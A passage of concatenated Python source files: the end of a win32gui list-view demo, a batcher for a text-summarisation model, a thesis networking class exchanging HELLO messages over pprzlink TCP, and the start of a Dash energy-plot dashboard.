win32gui.SendMessage(self.hwndList, commctrl.LVM_SETIMAGELIST,
commctrl.LVSIL_SMALL, il)
# Setup the list control columns.
lvc = LVCOLUMN(mask = commctrl.LVCF_FMT | commctrl.LVCF_WIDTH | commctrl.LVCF_TEXT | commctrl.LVCF_SUBITEM)
lvc.fmt = commctrl.LVCFMT_LEFT
lvc.iSubItem = 1
lvc.text = "Title"
lvc.cx = 200
win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTCOLUMN, 0, lvc.toparam())
lvc.iSubItem = 0
lvc.text = "Order"
lvc.cx = 50
win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTCOLUMN, 0, lvc.toparam())
win32gui.UpdateWindow(self.hwnd)
def ClearListItems(self):
win32gui.SendMessage(self.hwndList, commctrl.LVM_DELETEALLITEMS)
self.list_data = {}
def AddListItem(self, data, *columns):
num_items = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETITEMCOUNT)
item = LVITEM(text=columns[0], iItem = num_items)
new_index = win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTITEM, 0, item.toparam())
col_no = 1
for col in columns[1:]:
item = LVITEM(text=col, iItem = new_index, iSubItem = col_no)
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETITEM, 0, item.toparam())
col_no += 1
self.list_data[new_index] = data
def OnInitDialog(self, hwnd, msg, wparam, lparam):
self.hwnd = hwnd
# centre the dialog
desktop = win32gui.GetDesktopWindow()
l,t,r,b = win32gui.GetWindowRect(self.hwnd)
dt_l, dt_t, dt_r, dt_b = win32gui.GetWindowRect(desktop)
centre_x, centre_y = win32gui.ClientToScreen( desktop, ( (dt_r-dt_l)//2, (dt_b-dt_t)//2) )
win32gui.MoveWindow(hwnd, centre_x-(r//2), centre_y-(b//2), r-l, b-t, 0)
self._SetupList()
l,t,r,b = win32gui.GetClientRect(self.hwnd)
self._DoSize(r-l,b-t, 1)
def _DoSize(self, cx, cy, repaint = 1):
# right-justify the textbox.
ctrl = win32gui.GetDlgItem(self.hwnd, IDC_SEARCHTEXT)
l, t, r, b = win32gui.GetWindowRect(ctrl)
l, t = win32gui.ScreenToClient(self.hwnd, (l,t) )
r, b = win32gui.ScreenToClient(self.hwnd, (r,b) )
win32gui.MoveWindow(ctrl, l, t, cx-l-5, b-t, repaint)
# The button.
ctrl = win32gui.GetDlgItem(self.hwnd, IDC_BUTTON_DISPLAY)
l, t, r, b = win32gui.GetWindowRect(ctrl)
l, t = win32gui.ScreenToClient(self.hwnd, (l,t) )
r, b = win32gui.ScreenToClient(self.hwnd, (r,b) )
list_y = b + 10
w = r - l
win32gui.MoveWindow(ctrl, cx - 5 - w, t, w, b-t, repaint)
# The list control
win32gui.MoveWindow(self.hwndList, 0, list_y, cx, cy-list_y, repaint)
# The last column of the list control.
new_width = cx - win32gui.SendMessage(self.hwndList, commctrl.LVM_GETCOLUMNWIDTH, 0)
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETCOLUMNWIDTH, 1, new_width)
def OnSize(self, hwnd, msg, wparam, lparam):
x = win32api.LOWORD(lparam)
y = win32api.HIWORD(lparam)
self._DoSize(x,y)
return 1
def OnSearchResult(self, hwnd, msg, wparam, lparam):
try:
while 1:
params = self.result_queue.get(0)
self.AddListItem(*params)
except queue.Empty:
pass
def OnSearchFinished(self, hwnd, msg, wparam, lparam):
print("OnSearchFinished")
def OnNotify(self, hwnd, msg, wparam, lparam):
info = win32gui_struct.UnpackNMITEMACTIVATE(lparam)
if info.code == commctrl.NM_DBLCLK:
print("Double click on item", info.iItem+1)
return 1
def OnCommand(self, hwnd, msg, wparam, lparam):
id = win32api.LOWORD(wparam)
if id == IDC_BUTTON_SEARCH:
self.ClearListItems()
def fill_slowly(q, hwnd):
import time
for i in range(20):
q.put(("whatever", str(i+1), "Search result " + str(i) ))
win32gui.PostMessage(hwnd, WM_SEARCH_RESULT, 0, 0)
time.sleep(.25)
win32gui.PostMessage(hwnd, WM_SEARCH_FINISHED, 0, 0)
import threading
self.result_queue = queue.Queue()
thread = threading.Thread(target = fill_slowly, args=(self.result_queue, self.hwnd) )
thread.start()
elif id == IDC_BUTTON_DISPLAY:
print("Display button selected")
sel = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETNEXTITEM, -1, commctrl.LVNI_SELECTED)
print("The selected item is", sel+1)
# These function differ based on how the window is used, so may be overridden
def OnClose(self, hwnd, msg, wparam, lparam):
raise NotImplementedError
def OnDestroy(self, hwnd, msg, wparam, lparam):
pass
# An implementation suitable for use with the Win32 Window functions (ie, not
# a true dialog)
class DemoWindow(DemoWindowBase):
def CreateWindow(self):
# Create the window via CreateDialogBoxIndirect - it can then
# work as a "normal" window, once a message loop is established.
self._DoCreate(win32gui.CreateDialogIndirect)
def OnClose(self, hwnd, msg, wparam, lparam):
win32gui.DestroyWindow(hwnd)
# We need to arrange to a WM_QUIT message to be sent to our
# PumpMessages() loop.
def OnDestroy(self, hwnd, msg, wparam, lparam):
win32gui.PostQuitMessage(0) # Terminate the app.
# An implementation suitable for use with the Win32 Dialog functions.
class DemoDialog(DemoWindowBase):
def DoModal(self):
return self._DoCreate(win32gui.DialogBoxIndirect)
def OnClose(self, hwnd, msg, wparam, lparam):
win32gui.EndDialog(hwnd, 0)
def DemoModal():
w=DemoDialog()
w.DoModal()
def DemoCreateWindow():
w=DemoWindow()
w.CreateWindow()
# PumpMessages runs until PostQuitMessage() is called by someone.
win32gui.PumpMessages()
if __name__=='__main__':
DemoModal()
DemoCreateWindow()
|
batcher.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
# Modifications Copyright 2017 Abigail See
# Modifications made 2018 by Logan Lebanoff
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""This file contains code to process data into batches"""
import Queue
from random import shuffle
from threading import Thread
import time
import numpy as np
import data
import nltk
from convert_data import process_sent
import util
from absl import logging
class Example(object):
"""Class representing a train/val/test example for text summarization."""
def __init__(self, article, abstract_sentences, all_abstract_sentences, doc_indices, raw_article_sents, vocab, hps):
"""Initializes the Example, performing tokenization and truncation to produce the encoder, decoder and target sequences, which are stored in self.
Args:
article: source text; a string. each token is separated by a single space.
abstract_sentences: list of strings, one per abstract sentence. In each sentence, each token is separated by a single space.
vocab: Vocabulary object
hps: hyperparameters
"""
self.hps = hps
# Get ids of special tokens
start_decoding = vocab.word2id(data.START_DECODING)
stop_decoding = vocab.word2id(data.STOP_DECODING)
# Process the article
article_words = article.split()
if len(article_words) > hps.max_enc_steps:
article_words = article_words[:hps.max_enc_steps]
self.enc_input = [vocab.word2id(w) for w in article_words] # list of word ids; OOVs are represented by the id for UNK token
# Process the abstract
abstract = ' '.join(abstract_sentences) # string
abstract_words = abstract.split() # list of strings
abs_ids = [vocab.word2id(w) for w in abstract_words] # list of word ids; OOVs are represented by the id for UNK token
# Get the decoder input sequence and target sequence
self.dec_input, self.target = self.get_dec_inp_targ_seqs(abs_ids, hps.max_dec_steps, start_decoding, stop_decoding)
self.dec_len = len(self.dec_input)
# If using pointer-generator mode, we need to store some extra info
if hps.pointer_gen:
if raw_article_sents is not None and len(raw_article_sents) > 0:
self.tokenized_sents = [process_sent(sent) for sent in raw_article_sents]
self.word_ids_sents, self.article_oovs = data.tokenizedarticle2ids(self.tokenized_sents, vocab)
self.enc_input_extend_vocab = util.flatten_list_of_lists(self.word_ids_sents)
self.enc_len = len(self.enc_input_extend_vocab) # store the length after truncation but before padding
else:
# Store a version of the enc_input where in-article OOVs are represented by their temporary OOV id; also store the in-article OOVs words themselves
article_str = util.to_unicode(article)
raw_article_sents = nltk.tokenize.sent_tokenize(article_str)
self.tokenized_sents = [process_sent(sent) for sent in raw_article_sents]
self.word_ids_sents, self.article_oovs = data.tokenizedarticle2ids(self.tokenized_sents, vocab)
self.enc_input_extend_vocab = util.flatten_list_of_lists(self.word_ids_sents)
# self.enc_input_extend_vocab, self.article_oovs = data.article2ids(article_words, vocab)
self.enc_len = len(self.enc_input_extend_vocab) # store the length after truncation but before padding
# Get a verison of the reference summary where in-article OOVs are represented by their temporary article OOV id
abs_ids_extend_vocab = data.abstract2ids(abstract_words, vocab, self.article_oovs)
# Overwrite decoder target sequence so it uses the temp article OOV ids
_, self.target = self.get_dec_inp_targ_seqs(abs_ids_extend_vocab, hps.max_dec_steps, start_decoding, stop_decoding)
# Store the original strings
self.original_article = article
self.raw_article_sents = raw_article_sents
self.original_abstract = abstract
self.original_abstract_sents = abstract_sentences
self.all_original_abstract_sents = all_abstract_sentences
self.doc_indices = doc_indices
def get_dec_inp_targ_seqs(self, sequence, max_len, start_id, stop_id):
"""Given the reference summary as a sequence of tokens, return the input sequence for the decoder, and the target sequence which we will use to calculate loss. The sequence will be truncated if it is longer than max_len. The input sequence must start with the start_id and the target sequence must end with the stop_id (but not if it's been truncated).
Args:
sequence: List of ids (integers)
max_len: integer
start_id: integer
stop_id: integer
Returns:
inp: sequence length <=max_len starting with start_id
target: sequence same length as input, ending with stop_id only if there was no truncation
"""
inp = [start_id] + sequence[:]
target = sequence[:]
if len(inp) > max_len: # truncate
inp = inp[:max_len]
target = target[:max_len] # no end_token
else: # no truncation
target.append(stop_id) # end token
assert len(inp) == len(target)
return inp, target
def pad_decoder_inp_targ(self, max_len, pad_id):
"""Pad decoder input and target sequences with pad_id up to max_len."""
while len(self.dec_input) < max_len:
self.dec_input.append(pad_id)
while len(self.target) < max_len:
self.target.append(pad_id)
def pad_encoder_input(self, max_len, pad_id):
"""Pad the encoder input sequence with pad_id up to max_len."""
while len(self.enc_input) < max_len:
self.enc_input.append(pad_id)
if self.hps.pointer_gen:
while len(self.enc_input_extend_vocab) < max_len:
self.enc_input_extend_vocab.append(pad_id)
def pad_doc_indices(self, max_len, pad_id):
"""Pad the encoder input sequence with pad_id up to max_len."""
while len(self.doc_indices) < max_len:
self.doc_indices.append(pad_id)
class Batch(object):
"""Class representing a minibatch of train/val/test examples for text summarization."""
def __init__(self, example_list, hps, vocab):
"""Turns the example_list into a Batch object.
Args:
example_list: List of Example objects
hps: hyperparameters
vocab: Vocabulary object
"""
self.pad_id = vocab.word2id(data.PAD_TOKEN) # id of the PAD token used to pad sequences
self.init_encoder_seq(example_list, hps) # initialize the input to the encoder
self.init_decoder_seq(example_list, hps) # initialize the input and targets for the decoder
self.store_orig_strings(example_list) # store the original strings
def init_encoder_seq(self, example_list, hps):
"""Initializes the following:
self.enc_batch:
numpy array of shape (batch_size, <=max_enc_steps) containing integer ids (all OOVs represented by UNK id), padded to length of longest sequence in the batch
self.enc_lens:
numpy array of shape (batch_size) containing integers. The (truncated) length of each encoder input sequence (pre-padding).
self.enc_padding_mask:
numpy array of shape (batch_size, <=max_enc_steps), containing 1s and 0s. 1s correspond to real tokens in enc_batch and target_batch; 0s correspond to padding.
If hps.pointer_gen, additionally initializes the following:
self.max_art_oovs:
maximum number of in-article OOVs in the batch
self.art_oovs:
list of list of in-article OOVs (strings), for each example in the batch
self.enc_batch_extend_vocab:
Same as self.enc_batch, but in-article OOVs are represented by their temporary article OOV number.
"""
# Determine the maximum length of the encoder input sequence in this batch
max_enc_seq_len = max([ex.enc_len for ex in example_list])
# Pad the encoder input sequences up to the length of the longest sequence
for ex in example_list:
ex.pad_encoder_input(max_enc_seq_len, self.pad_id)
ex.pad_doc_indices(max_enc_seq_len, 0)
# Initialize the numpy arrays
# Note: our enc_batch can have different length (second dimension) for each batch because we use dynamic_rnn for the encoder.
self.enc_batch = np.zeros((hps.batch_size, max_enc_seq_len), dtype=np.int32)
self.enc_lens = np.zeros((hps.batch_size), dtype=np.int32)
self.enc_padding_mask = np.zeros((hps.batch_size, max_enc_seq_len), dtype=np.float32)
self.doc_indices = np.zeros((hps.batch_size, max_enc_seq_len), dtype=np.float32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.enc_batch[i, :] = ex.enc_input[:]
self.enc_lens[i] = ex.enc_len
for j in xrange(ex.enc_len):
self.enc_padding_mask[i][j] = 1
self.doc_indices[i, :] = ex.doc_indices
# For pointer-generator mode, need to store some extra info
if hps.pointer_gen:
# Determine the max number of in-article OOVs in this batch
self.max_art_oovs = max([len(ex.article_oovs) for ex in example_list])
# Store the in-article OOVs themselves
self.art_oovs = [ex.article_oovs for ex in example_list]
# Store the version of the enc_batch that uses the article OOV ids
self.enc_batch_extend_vocab = np.zeros((hps.batch_size, max_enc_seq_len), dtype=np.int32)
for i, ex in enumerate(example_list):
self.enc_batch_extend_vocab[i, :] = ex.enc_input_extend_vocab[:]
def init_decoder_seq(self, example_list, hps):
"""Initializes the following:
self.dec_batch:
numpy array of shape (batch_size, max_dec_steps), containing integer ids as input for the decoder, padded to max_dec_steps length.
self.target_batch:
numpy array of shape (batch_size, max_dec_steps), containing integer ids for the target sequence, padded to max_dec_steps length.
self.dec_padding_mask:
numpy array of shape (batch_size, max_dec_steps), containing 1s and 0s. 1s correspond to real tokens in dec_batch and target_batch; 0s correspond to padding.
"""
# Pad the inputs and targets
for ex in example_list:
ex.pad_decoder_inp_targ(hps.max_dec_steps, self.pad_id)
# Initialize the numpy arrays.
# Note: our decoder inputs and targets must be the same length for each batch (second dimension = max_dec_steps) because we do not use a dynamic_rnn for decoding. However I believe this is possible, or will soon be possible, with Tensorflow 1.0, in which case it may be best to upgrade to that.
self.dec_batch = np.zeros((hps.batch_size, hps.max_dec_steps), dtype=np.int32)
self.target_batch = np.zeros((hps.batch_size, hps.max_dec_steps), dtype=np.int32)
self.dec_padding_mask = np.zeros((hps.batch_size, hps.max_dec_steps), dtype=np.float32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.dec_batch[i, :] = ex.dec_input[:]
self.target_batch[i, :] = ex.target[:]
for j in xrange(ex.dec_len):
self.dec_padding_mask[i][j] = 1
def store_orig_strings(self, example_list):
"""Store the original article and abstract strings in the Batch object"""
self.original_articles = [ex.original_article for ex in example_list] # list of lists
self.raw_article_sents = [ex.raw_article_sents for ex in example_list]
self.tokenized_sents = [ex.tokenized_sents for ex in example_list]
self.word_ids_sents = [ex.word_ids_sents for ex in example_list]
self.original_abstracts = [ex.original_abstract for ex in example_list] # list of lists
self.original_abstracts_sents = [ex.original_abstract_sents for ex in example_list] # list of list of lists
self.all_original_abstracts_sents = [ex.all_original_abstract_sents for ex in example_list] # list of list of list of lists
class Batcher(object):
"""A class to generate minibatches of data. Buckets examples together based on length of the encoder sequence."""
BATCH_QUEUE_MAX = 100 # max number of batches the batch_queue can hold
def __init__(self, data_path, vocab, hps, single_pass, cnn_500_dm_500=False):
"""Initialize the batcher. Start threads that process the data into batches.
Args:
data_path: tf.Example filepattern.
vocab: Vocabulary object
hps: hyperparameters
single_pass: If True, run through the dataset exactly once (useful for when you want to run evaluation on the dev or test set). Otherwise generate random batches indefinitely (useful for training).
"""
self._data_path = data_path
self._vocab = vocab
self._hps = hps
self._single_pass = single_pass
self._cnn_500_dm_500 = cnn_500_dm_500
# Initialize a queue of Batches waiting to be used, and a queue of Examples waiting to be batched
self._batch_queue = Queue.Queue(self.BATCH_QUEUE_MAX)
self._example_queue = Queue.Queue(self.BATCH_QUEUE_MAX * self._hps.batch_size)
# Different settings depending on whether we're in single_pass mode or not
if single_pass:
self._num_example_q_threads = 1 # just one thread, so we read through the dataset just once
self._num_batch_q_threads = 1 # just one thread to batch examples
self._bucketing_cache_size = 1 # only load one batch's worth of examples before bucketing; this essentially means no bucketing
self._finished_reading = False # this will tell us when we're finished reading the dataset
else:
self._num_example_q_threads = 16 # num threads to fill example queue
self._num_batch_q_threads = 4 # num threads to fill batch queue
self._bucketing_cache_size = 100 # how many batches-worth of examples to load into cache before bucketing
# Start the threads that load the queues
self._example_q_threads = []
for _ in xrange(self._num_example_q_threads):
self._example_q_threads.append(Thread(target=self.fill_example_queue))
self._example_q_threads[-1].daemon = True
self._example_q_threads[-1].start()
self._batch_q_threads = []
for _ in xrange(self._num_batch_q_threads):
self._batch_q_threads.append(Thread(target=self.fill_batch_queue))
self._batch_q_threads[-1].daemon = True
self._batch_q_threads[-1].start()
# Start a thread that watches the other threads and restarts them if they're dead
if not single_pass: # We don't want a watcher in single_pass mode because the threads shouldn't run forever
self._watch_thread = Thread(target=self.watch_threads)
self._watch_thread.daemon = True
self._watch_thread.start()
def next_batch(self):
"""Return a Batch from the batch queue.
If mode='decode' or 'calc_features' then each batch contains a single example repeated beam_size-many times; this is necessary for beam search.
Returns:
batch: a Batch object, or None if we're in single_pass mode and we've exhausted the dataset.
"""
# If the batch queue is empty, print a warning
if self._batch_queue.qsize() == 0:
logging.warning('Bucket input queue is empty when calling next_batch. Bucket queue size: %i, Input queue size: %i', self._batch_queue.qsize(), self._example_queue.qsize())
if self._single_pass and self._finished_reading:
logging.info("Finished reading dataset in single_pass mode.")
return None
batch = self._batch_queue.get() # get the next Batch
return batch
def fill_example_queue(self):
"""Reads data from file and processes into Examples which are then placed into the example queue."""
input_gen = self.text_generator(
data.example_generator(self._data_path, self._single_pass, self._cnn_500_dm_500))
# counter = 0
while True:
try:
(article,
abstracts, doc_indices_str, raw_article_sents) = input_gen.next() # read the next example from file. article and abstract are both strings.
except StopIteration: # if there are no more examples:
logging.info("The example generator for this example queue filling thread has exhausted data.")
if self._single_pass:
logging.info(
"single_pass mode is on, so we've finished reading dataset. This thread is stopping.")
self._finished_reading = True
break
else:
raise Exception("single_pass mode is off but the example generator is out of data; error.")
all_abstract_sentences = [[sent.strip() for sent in data.abstract2sents(
abstract)] for abstract in abstracts]
if len(all_abstract_sentences) != 0:
abstract_sentences = all_abstract_sentences[0]
else:
abstract_sentences = []
doc_indices = [int(idx) for idx in doc_indices_str.strip().split()]
example = Example(article, abstract_sentences, all_abstract_sentences, doc_indices, raw_article_sents, self._vocab, self._hps) # Process into an Example.
self._example_queue.put(example) # place the Example in the example queue.
# print "example num", counter
# counter += 1
def fill_batch_queue(self):
"""Takes Examples out of example queue, sorts them by encoder sequence length, processes into Batches and places them in the batch queue.
In decode mode, makes batches that each contain a single example repeated.
"""
while True:
# print 'hi'
if self._hps.mode != 'decode' and self._hps.mode != 'calc_features':
# Get bucketing_cache_size-many batches of Examples into a list, then sort
inputs = []
for _ in xrange(self._hps.batch_size * self._bucketing_cache_size):
inputs.append(self._example_queue.get())
inputs = sorted(inputs, key=lambda inp: inp.enc_len) # sort by length of encoder sequence
# Group the sorted Examples into batches, optionally shuffle the batches, and place in the batch queue.
batches = []
for i in xrange(0, len(inputs), self._hps.batch_size):
batches.append(inputs[i:i + self._hps.batch_size])
if not self._single_pass:
shuffle(batches)
for b in batches: # each b is a list of Example objects
self._batch_queue.put(Batch(b, self._hps, self._vocab))
elif self._hps.mode == 'decode': # beam search decode mode
ex = self._example_queue.get()
b = [ex for _ in xrange(self._hps.batch_size)]
self._batch_queue.put(Batch(b, self._hps, self._vocab))
else: # calc features mode
inputs = []
for _ in xrange(self._hps.batch_size * self._bucketing_cache_size):
inputs.append(self._example_queue.get())
# print "_ %d"%_
# print "inputs len%d"%len(inputs)
# Group the sorted Examples into batches, and place in the batch queue.
batches = []
for i in xrange(0, len(inputs), self._hps.batch_size):
# print i
batches.append(inputs[i:i + self._hps.batch_size])
# if not self._single_pass:
# shuffle(batches)
for b in batches: # each b is a list of Example objects
self._batch_queue.put(Batch(b, self._hps, self._vocab))
def watch_threads(self):
"""Watch example queue and batch queue threads and restart if dead."""
while True:
time.sleep(60)
for idx,t in enumerate(self._example_q_threads):
if not t.is_alive(): # if the thread is dead
logging.error('Found example queue thread dead. Restarting.')
new_t = Thread(target=self.fill_example_queue)
self._example_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
for idx,t in enumerate(self._batch_q_threads):
if not t.is_alive(): # if the thread is dead
logging.error('Found batch queue thread dead. Restarting.')
new_t = Thread(target=self.fill_batch_queue)
self._batch_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
def text_generator(self, example_generator):
"""Generates article and abstract text from tf.Example.
Args:
example_generator: a generator of tf.Examples from file. See data.example_generator"""
while True:
e = example_generator.next() # e is a tf.Example
abstract_texts = []
raw_article_sents = []
try:
article_text = e.features.feature['article'].bytes_list.value[0] # the article text was saved under the key 'article' in the data files
for abstract in e.features.feature['abstract'].bytes_list.value:
abstract_texts.append(abstract) # the abstract text was saved under the key 'abstract' in the data files
if 'doc_indices' not in e.features.feature or len(e.features.feature['doc_indices'].bytes_list.value) == 0:
num_words = len(article_text.split())
doc_indices_text = '0 ' * num_words
else:
doc_indices_text = e.features.feature['doc_indices'].bytes_list.value[0]
for sent in e.features.feature['raw_article_sents'].bytes_list.value:
raw_article_sents.append(sent) # the abstract text was saved under the key 'abstract' in the data files
except ValueError:
logging.error('Failed to get article or abstract from example')
continue
if len(article_text)==0: # See https://github.com/abisee/pointer-generator/issues/1
logging.warning('Found an example with empty article text. Skipping it.')
else:
yield (article_text, abstract_texts, doc_indices_text, raw_article_sents)
|
network_pprz_tcp.py
|
#!/usr/bin/env python3
"""
Router class is part of a thesis work about distributed systems
"""
__author__ = "Julie Morvan"
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Julie Morvan"
__email__ = "julie.morvan999@hotmail.fr"
import socket, os, math, struct, sys, json, traceback, zlib, fcntl, threading, time, pickle
from apscheduler.schedulers.background import BackgroundScheduler
import pprzlink.tcp
import pprzlink.messages_xml_map as messages_xml_map
import pprzlink.message as message
from pprzlink.pprz_transport import PprzTransport
class Network():
def __init__(self, Node, ip):
'Initializes the properties of the Node object'
self.scheduler = BackgroundScheduler()
#### NODE ###############################################################################
self.Node = Node
self.NodeNumber = self.Node.tag_number
self.visible = [] # our visible neighbours
self.ever_visible = [] # our visible neighbours
self.visibility_lost = []
self.messages_created = [] # messages created by each node
self.messages = []
self.average = 0
self.topology = []
self.down_port = 57555 # UDP/TCP port
self.up_port = 57444 # UDP port
#### NETWORK ##############################################################################
self.ip = ip
if self.ip == 'IPV4':
self.bcast_group = '10.0.0.255' # broadcast ip address
elif self.ip == 'IPV6':
self.bcast_group = 'ff02::1'
self.port = 56123 # UDP port
self.max_packet = 65535 # max packet size to listen
#### UTILITIES ############################################################################
self.protocol_stats = [0,0,0,0] # created, forwarded, delivered, discarded
self.errors = [0,0,0]
self.myip = ''
#### Layer specific ####################################################################
self.ttl = 16 #not used now
self.fanout_max = 3
self.mode = "NDM" #close neighbouhood discover mode
self.packets = 0
self.traffic = 0
self.helloInterval = 0.2
self.visible_timeout = self.helloInterval * 5 #timeout when visible neighbours should be removed from list in s TODO make it setting
##################### END OF DEFAULT SETTINGS ###########################################################
self._setup()
self.listener_thread = threading.Thread(target=self._listener, args=())
self.sender_thread = threading.Thread(target=self._sender, args=())
self.scheduler.add_job(self._sendHello, 'interval', seconds=self.helloInterval, id='membership')
self.scheduler.add_job(self._analyse_visible, 'interval', seconds=0.1, id='membership_analysis')
############### Public methods ###########################
def start(self):
self.listener_thread.start()
self.sender_thread.start()
self.scheduler.start()
def shutdown(self):
self.scheduler.shutdown()
self.listener_thread.join(timeout=2)
self.sender_thread.join(timeout=2)
def printinfo(self):
'Prints general information about the node'
print()
print("STUB - Using the OS routing and network")
print("Broadcast IP: " + self.bcast_group)
print()
def printvisible(self):
print("Visible neighbours at:" + str(self.Node.simulation_seconds) )
print("===============================================================================")
print("|Node ID |Battery |State |Processor |Memory |Last seen |Address")
print("-------------------------------------------------------------------------------")
for member in range(len(self.visible)): # print characteristic or the neighbours
print("|" + self.visible[member][0] + " |" + str(self.visible[member][1]) + " |" + str(self.visible[member][2]) + " |" + str(self.visible[member][3]) + " |" + str(self.visible[member][4]) + " |" + str(self.visible[member][5])+ " |" + str(self.visible[member][6]))
print("===============================================================================")
############### Private methods ##########################
def _setup(self):
settings_file = open("./classes/network/settings.json","r").read()
settings = json.loads(settings_file)
self.port = settings['networkPort']
self.bcast_group = settings['ipv4bcast']
self.helloInterval = settings['helloInterval']
self.visible_timeout = settings['visibleTimeout']
def _listener(self):
'This method uses pprzlink to receive data.'
#self.udp = pprzlink.udp.UdpMessagesInterface(
self.tcp = pprzlink.tcp.TcpMessagesInterface(
self._packet_handler, # Callback
uplink_port = self.up_port, # Port we send messages to
downlink_port = self.down_port, # Port used to receive messages
verbose = False,
interface_id = self.NodeNumber # Numerical id of the interface
)
self.tcp.start()
def _sender(self):
'Uses pprzlink to send data'
self.tcp_sender = pprzlink.tcp.TcpMessagesInterface(
self._packet_handler, # Callback function
uplink_port = self.down_port, # Port we send messages to
downlink_port = self.up_port, # Port used to receive messages
interface_id = self.NodeNumber # Numerical id of the interface
)
self.tcp_sender.start()
def _packet_handler(self, sender, address, msg, length, receiver_id = None, component_id = None):
'When a message of type genesis is received from neighbours this method unpacks and handles it'
if msg.name == "HELLO":
# Unpack the hello message
node = b''.join(msg.get_field(0)).decode()
battery = msg.get_field(1)
state = msg.get_field(2)
processor = msg.get_field(3)
memory = msg.get_field(4)
if (node != self.Node.fulltag):
if len(self.visible) > 0: # List no empty, check if already there
not_there = 1
for element in range(len(self.visible)):
if node == self.visible[element][0]: # If already there: update
self.visible[element][5] = self.Node.simulation_seconds # refresh timestamp
self.visible[element][4] = memory # refresh memory
self.visible[element][3] = processor # refresh processor load
self.visible[element][2] = state # refresh state
self.visible[element][1] = battery # refresh battery
not_there = 0
break
if not_there: # If not there: add the node to the neighbours
self.visible.append([node, battery, state, processor, memory, self.Node.simulation_seconds, address[0]])
else: # Empty neighbours list, add the node to the neighbours
self.visible.append([node, battery, state, processor, memory, self.Node.simulation_seconds, address[0]])
else:
print('not hello')
def _createHello(self):
_hello = message.PprzMessage('genesis', 'HELLO')
_hello.set_value_by_name("nodeid", self.Node.fulltag) # associate values to the different fields of the HELLO message
_hello.set_value_by_name("battery", 85)
_hello.set_value_by_name("state", 1)
_hello.set_value_by_name("cpu_load", 50)
_hello.set_value_by_name("used_memory", 25)
self.messages_created.append([hex(1),self.Node.simulation_seconds])
return _hello
def _sendHello(self):
self.tcp_sender.send(self._createHello(), self.NodeNumber, self.bcast_group, 255) # send hello message to broadcast
self._update_visible()
def _setbcast(self, bcast):
self.bcast_group = bcast
def _update_visible(self):
for member in range(len(self.visible)):
if (self.Node.simulation_seconds - self.visible[member][5] > self.visible_timeout):
del self.visible[member]
break
def _analyse_visible(self):
for member in range(len(self.visible)):
found = 0
for ever_member in range(len(self.ever_visible)):
if self.visible[member][0] == self.ever_visible[ever_member][0]:
found = 1
if self.ever_visible[ever_member][5] != 0:
#calculate absense
abesense = int(time.time() * 1000) - self.ever_visible[ever_member][5]
#store absense for report
self.visibility_lost.append([self.ever_visible[ever_member][0], abesense])
self.ever_visible[ever_member][5] = 0
if found == 0:
self.ever_visible.append([self.visible[member][0], 0, 0, 0, 0, 0,0])
for ever_member in range(len(self.ever_visible)):
found = 0
for member in range(len(self.visible)):
if self.visible[member][0] == self.ever_visible[ever_member][0]:
found = 1
if found == 0:
if self.ever_visible[ever_member][5] == 0:
self.ever_visible[ever_member][1] -= 1 # values to modify later (battery - 1)
self.ever_visible[ever_member][2] += 1 # (state + 1)
self.ever_visible[ever_member][3] += 1 # (processor load + 1)
self.ever_visible[ever_member][4] -= 1 # (memory - 1)
self.ever_visible[ever_member][5] = int(time.time() * 1000)
def _print_ever(self):
for member in self.ever_visible:
print(member)
def _prompt(self, command):
if (len(command)) >= 2:
if command[1] == 'help':
self._printhelp()
elif command[1] == 'info':
self.printinfo()
elif command[1] == 'bcast':
self._setbcast(command[2])
elif command[1] == 'ever':
self._print_ever()
elif command[1] == 'lost':
for member in self.visibility_lost:
print(member)
else:
print("Invalid Option")
self._printhelp()
elif (len(command)) == 1:
self.printinfo()
def _get_ip(self,iface = 'eth0'):
'Gets IP address'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sockfd = sock.fileno()
SIOCGIFADDR = 0x8915
ifreq = struct.pack('16sH14s', iface.encode('utf-8'), socket.AF_INET, b'\x00'*14)
try:
res = fcntl.ioctl(sockfd, SIOCGIFADDR, ifreq)
except:
traceback.print_exc()
return None
ip = struct.unpack('16sH2x4s8x', res)[2]
return socket.inet_ntoa(ip)
|
dash_ppdyn.py
|
import ini
import time
import os.path
from os.path import join as pjoin
import numpy as np
import pandas as pd
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.graph_objects as go
import webbrowser
# from multiprocessing import Process
def dash_energy(input):
path ='data'
params = ini.parse(open(input).read())
N = int(params['particles']['N']) # Number of particles
tmax = float(params['time']['tmax'])
realTime = bool(params['diagnostics']['realTime'])
pd.options.plotting.backend = "plotly"
countdown = 20
if os.path.exists(pjoin(path,'energy.txt')):
time,energy = np.loadtxt(pjoin(path,'energy.txt'),unpack=True)
data = np.stack((time, energy), axis=1)
df = pd.DataFrame(data, columns=['timestep', 'Energy'])
fig = df.plot(template = 'plotly_dark')
else:
fig = go.Figure(data=[go.Scatter(x=[], y=[])])
fig.layout.template = 'plotly_dark'
app = dash.Dash(__name__, update_title=None) # remove "Updating..." from title
app.layout = html.Div([
html.H1("PPDyn: Energy"),
dcc.Interval(
id='interval-component',
interval=1*1000, # in milliseconds
n_intervals=0
),
dcc.Graph(id='graph'),
])
# Define callback to update graph
@app.callback(
Output('graph', 'figure'),
[Input('interval-component', "n_intervals")]
)
def streamFig(value):
global df
if os.path.exists(pjoin(path,'energy.txt')):
time,energy = np.loadtxt(pjoin(path,'energy.txt'),unpack=True)
data = np.stack((time, energy), axis=1)
